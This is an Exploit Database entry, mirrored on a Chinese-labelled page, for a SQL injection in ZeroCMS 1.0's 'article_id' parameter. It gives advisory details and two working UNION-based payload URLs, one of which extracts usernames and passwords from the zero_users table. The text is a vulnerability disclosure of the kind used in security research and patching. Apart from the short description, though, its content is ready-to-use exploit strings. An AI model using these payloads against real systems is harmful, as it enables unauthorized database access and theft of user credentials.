ZeroCMS 1.0 – ‘zero_view_article.php’ SQL Injection

• Exploit Database
• 14 阅读

• 作者： LiquidWorm
  日期： 2014-06-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/33702/

• 
  ZeroCMS 1.0 (article_id) SQL Injection Vulnerability
  
  
  Vendor: Another Awesome Stuff
  Product web page: http://www.aas9.in/zerocms/
  Affected version: 1.0
  
  Summary: ZeroCMS is a very simple Content Management
  System built using PHP and MySQL.
  
  Desc: Input passed via the 'article_id' GET parameter
  to zero_view_article.php script is not properly sanitised
  before being used in SQL queries. This can be exploited
  to manipulate SQL queries by injecting arbitrary SQL code.
  
  Tested on: Apache/2.4.7 (Win32)
   PHP/5.5.6
   MySQL 5.6.14
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  @zeroscience
  
  
  Advisory ID: ZSL-2014-5186
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5186.php
  
  
  09.06.2014
  
  --
  
  
  http://localhost/zerocms/zero_view_article.php?article_id=1337+union+all+select+concat(unhex(hex(cast(database()+as+char)))),2,3,4,5,6--
  http://localhost/zerocms/zero_view_article.php?article_id=1337+union+all+select+(select+concat(unhex(hex(cast(zero_users.name+as+char))),0x20,0x7c,0x20,unhex(hex(cast(zero_users.password+as+char))))+from+`zcdb`.zero_users+limit 0,1),2,3,4,5,6--